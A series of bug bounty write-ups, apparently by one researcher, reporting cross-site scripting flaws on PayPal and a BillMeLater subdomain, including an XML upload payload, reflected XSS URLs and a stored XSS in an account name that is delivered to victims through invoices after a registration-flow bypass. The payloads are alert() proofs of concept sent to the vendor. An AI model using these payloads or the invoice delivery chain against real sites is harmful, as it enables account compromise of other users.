[BugBounty] Papyal XML Upload Cross Site Scripting Vulnerability

Greetings readers, today i want to share with you one of my latest findings on Paypal.com.When creating an invoice Paypal allows the users to upload attachements for the invoices one attachement that they allow is a XML file. What the developer may missed here is that you can actually insert HTML into XML files, the namespace allowing this for XML files is called xmlns and a valid xmlns file would look something like this :

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

When i uploaded a file with this content and the ending.xml the intepreter on Paypals site executed the Payload (in this case the alert 1). To fullfill the requirements for a bounty you always have to make such a vulnerability exploitable and therefore a risk for other Paypal Users. In this case it was pretty easy, you could either way send the Link to this file directly (it doesn’t matter wether the user is logged in or not) or you send it with the Invoice and wait for the user to klick on it.

Here is the POC i sent in to the Paypal bug bounty team :

If you have have questions on this particular case please don’t hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com

All the best

Patrik

 

[BugBounty] Reflected Cross Site Scripting at Paypal.com

Dear followers, i found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following Payload:

&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

The vulnerable Parameter was the q? Parameter, i was able to break the script contex of the page, i think it was because of the &q Parameteter, but i am not sure Paypal fixed this issue to fast so i couldn’t analyze it more in depth :/

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

Here is my POC i sent in to Paypal :  hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at patrik.fehrenbach(at)it-securityguard.com All the best Patrik

 

[BugBounty] Reflected Cross Site Scripting BillMeLater

Dear followers,

i recently found a reflected Cross Site Scripting issue on a Subdomain of BillMeLater (Paypal acquisition) it was possible to break the style attribute and add malicious Javascript Code into the Application.

"--></style></ script >< script > alert ("XSS  ")</ script >

When ending the previous style and script element it was possible to add a new script element and executing the Payload, the complete URL looks like this now :

http://wwwb.search.billmelater.com/coupons/store/guess/?u=%27%22–%3E%3C/style%3E%3C/%20script%20%3E%3C%20script%20%3E%20alert%20%28%22XSS%20%20%22%29%3C/%20script%20%3E

thefindt

This one only worked in Firefox, Chrome and IE restricted the execution with the anti XSS feature.

The Bug was categorized as “Out of Scope” for whatever reason.

Hope you enjoyed, if you have any question left, please don’t hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com

 

[BugBounty] Paypal stored XSS + Security bypass

Dear followers,

i recently discovered a stored cross site scripting vulnerability on Paypal’s core site. The scenario is a bit weird, but i hope to explain everything as good as possible.

During my testings i often create accounts with malicious Javascript contet as the Name, Organization etc etc. While testing on Paypal i did the same, i tried to make an account with the username.

"><img src=x onerror javascript=alert(1337)">.jpg

But when i tried to fullfill the registration the security module of Paypal showed me an error that there is some kind problem with my request. When i looked at the URL i saw that there was some kind of progress bar

https://www.paypal.com/webapps/merchantboarding/webflow/unifiedflow?execution=e1s1

What came first in my mind , it’s the same url you get once logged in into a legimitate accout, so i tried to erease everything after the /webapps/ url, and suddenly i was into my new Paypal account with the malicious Javascript content. I went to the profile settings page and saw that 3 of my javascript snippets were executed. So far so good. Some of you might know that you need a szenario in which users of Paypal could be exploited in order to recieve a bug bounty. So i thought about where i could inject this to other Paypal users. A few months ago i found also a stored cross site scripting issue within a invoice created by paypal. If you look at the landing page of paypal you will see that every invoice you recieve will include the name of the user that send it to you. So, my Username is malicious Javascript, and Paypal allows me to send invoices to every single Paypal user by just knowing their E-Mail. So i went further and created an invoice, and sent it to my second Paypal accout. I logged in to the second one, and the Javascript Prompt appears on my screen.

To summarize the progress :

1. Create an account with the malicious Payload

2. At the point where the Paypal systems stops you from continuing erease the URL till /webapps/ (bypassed the Security restriction)

3. Create an invoice, send it to the victim

4. Victim logs into the the Account and the Payload gets executed

I did a small POC Video which describes the impact :

I hope you enjoyed 🙂